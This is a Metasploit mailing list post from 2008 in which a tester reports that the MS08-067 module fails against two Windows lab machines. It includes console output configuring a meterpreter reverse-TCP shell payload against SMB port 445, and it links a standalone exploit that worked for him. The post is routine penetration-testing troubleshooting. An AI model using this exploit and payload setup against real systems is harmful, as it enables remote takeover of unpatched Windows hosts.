Metasploit mailing list archives

Previous By Date Next
Previous By Thread Next

problems with ms08_67

From: carlos_perez at darkoperator.com (Carlos Perez)
Date: Sun, 30 Nov 2008 23:48:39 +0000
I have been testing the exploit against 2 Virtual Machines in my lab.

host1: Windows 2003 with SP2 only
host2: Windows 2000 with SP4 only

both 32bits, I tested both from Ubuntu and Backtrack3 with the same result.


msf exploit(ms08_067_netapi) > exploit

[*] Handler binding to LHOST 10.10.10.19
[*] Started reverse handler
[*] Automatically detecting the target...
[*] Fingerprint: Windows 2003 Service Pack 2 - lang:Unknown
[*] Could not determine the exact language pack
[*] Exploit completed, but no session was created.
msf exploit(ms08_067_netapi) > show options

Module options:

   Name     Current Setting  Required  Description
   ----     ---------------  --------  -----------
   RHOST    10.10.10.7       yes       The target address
   RPORT    445              yes       Set the SMB service port
   SMBPIPE  BROWSER          yes       The pipe name to use (BROWSER,
SRVSVC)


Payload options (windows/meterpreter/reverse_tcp):

   Name      Current Setting
Required  Description
   ----      ---------------
--------  -----------
   DLL       /pentest/exploits/framework3/data/meterpreter/metsrv.dll
yes       The local path to the DLL to upload
   EXITFUNC  thread
yes       Exit technique: seh, thread, process
   LHOST     10.10.10.19
yes       The local address
   LPORT     4444
yes       The local port


Exploit target:

   Id  Name
   --  ----
   0   Automatic Targeting


msf exploit(ms08_067_netapi) > exploit

[*] Handler binding to LHOST 10.10.10.19
[*] Started reverse handler
[*] Automatically detecting the target...
[*] Fingerprint: Windows 2000 Service Pack 0 - 4 - lang:English
[*] Selected Target: Windows 2000 Universal
[*] Triggering the vulnerability...
[*] Transmitting intermediate stager for over-sized stage...(191 bytes)
[-] Exploit failed: DCERPC FAULT => 0xc00000fd
[*] Exploit completed, but no session was created.
msf exploit(ms08_067_netapi) >


I tested it with http://www.milw0rm.com/exploits/download/7132.py and in
both cases it worked. I'm working with the latest SVN version of Metasploit
as of today.

regards,
Carlos
-------------- next part --------------
An HTML attachment was scrubbed...
URL: <http://mail.metasploit.com/pipermail/framework/attachments/20081130/e92164d6/attachment.htm>
Previous By Date Next
Previous By Thread Next

Current thread: